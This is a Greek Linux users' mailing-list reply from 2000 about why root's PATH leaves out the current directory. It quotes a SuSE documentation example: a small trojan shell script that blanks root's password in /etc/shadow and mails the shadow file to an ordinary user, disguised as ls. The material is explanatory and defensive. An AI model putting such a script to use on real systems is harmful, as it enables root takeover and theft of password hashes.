root account hacked???

Fanis Dokianakis madf at hellug.gr
Thu Mar 23 03:48:39 EET 2000


>     You may have noticed while working with SuSe Linux that the current directory is excluded from the search path of "root". This is why when you are "root", you have to add the prefix ./ to launch commands from the current directory. The reason that SuSe Linux is configured this way is illustrated in the example below:

Opos leei edo o trehon katalogos pou vriskese o xristis root
p.x o /root den viskete anamesa stous katalogous pou to sistima psaxnei 
gia entoles, diladi den vriskete sto PATH (mia metavliti)
mporei na deis ti periehei ayti i metavliti me tin entoli
echo $PATH

> Suppose these is a user working on your system who creates the following script
> #!/bin/sh
> cat /etc/shadow | \
>    sed 's;\(^root:\)[^:]*\(:.*\);\1\2;' > /etc/shadow
>    mail user at linux.local -s "Root account hacked" < /etc/shadow
>    ls $*

ta passwords olon ton hriston mazi me kapies alles plirofories vriskonte
sto arxeio /etc/passwd, anoije to gia na deis tin morfi tou.
sta sistimata me shadowed passwords omos i simantiki pliroforia(ta passwords)
vriskonte sto arheio /etc/shadow to opoio einai mono prosvasimo apo ton root
i 2 kai 3 grammi se ayto to script afairoun apo to arheio shadow to pass
mono ean to ektelesei o root i kapios allos hristis me ta idia pronomia(uid=0)
etsi tin epomeni fora pou tha kanei login o root to password tha einai keno
diladi sto Password:  pataei ENTER


> Το δοκίμασα το παραπάνω πρόγραμματάκι αλλά δεν μπόρεσε να μου "χακάρει" το λογαγιασμό μου ως root. Αλλά, αν κατάλαβα καλά, o root πρέπει να βάλει κάποια directory στο search path για να μπορέσει αυτό το πρόγραμμα να κάνει την "καταστροφική" του δουλειά. Αυτό που θέλω να ρωτήσω είναι πως είναι δυνατόν με ένα απλό προγραμματάκι μιας σειράς κάποιος να σου κλέψει τον root account σου; 

o logos einai sxetika profanis eite den eheis shadowed passwords eite to script
einai lathos eite den to ekteleses san root

pantos ayto den einai <<klepsia>> afou gia na doulepsei ayti i methodos i opoia
alli paromia, hreiazese na eisai ROOT i na eheis paromoia pronomia (uid=0)

>     Ευχαριστώ πολύ για τον χρόνο σας
>

Filika Fanis

--
linux-greek-users mailing list -- http://lists.hellug.gr




More information about the Linux-greek-users mailing list